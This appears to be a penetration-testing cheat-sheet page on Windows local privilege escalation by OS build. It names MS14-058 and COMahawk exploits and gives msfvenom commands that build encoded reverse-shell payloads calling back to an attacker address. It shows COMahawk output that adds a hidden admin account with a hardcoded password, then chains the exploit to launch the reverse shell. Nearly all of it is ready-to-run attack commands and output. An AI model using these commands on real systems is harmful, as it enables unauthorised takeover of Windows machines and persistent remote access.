Build Exploits
Win 8.1 PRO Build 9600 - x64
ms14-058 - # Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)
https://gist.github.com/AfroThundr3007730/088b2e2ec4ff1eba295e073d1428d85d
SHELLCODE ->
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -f c
Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation
$ locate windows/local/47684.md
/usr/share/exploitdb/exploits/windows/local/47684.md
# System version number
winver - 1803 OS Build 17134.112
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
ReleaseId REG_SZ 1803
$ searchsploit 1803
# Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation
| windows/local/47684.md
$ locate windows/local/47684.md
/usr/share/exploitdb/exploits/windows/local/47684.md
C:\Users\test\Desktop>COMahawk.exe
[\] Progress: 1/9 2/9 3/9 4/9 5/9 6/9 7/9 8/9 9/9
[+] Hopefully Tomahawk:RibSt3ak69 is added as an admin.
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -f exe -e x86/shikata_ga_nai -i 8 -o rev.exe
COMahawk.exe "\Users\test\Desktop\rev.exe &"
Win XP SP0/SP1
https://sohvaxus.github.io/content/winxp-sp1-privesc.html
accesscheck.exe - Old Version - https://xor.cat/assets/other/Accesschk.zip
Last updated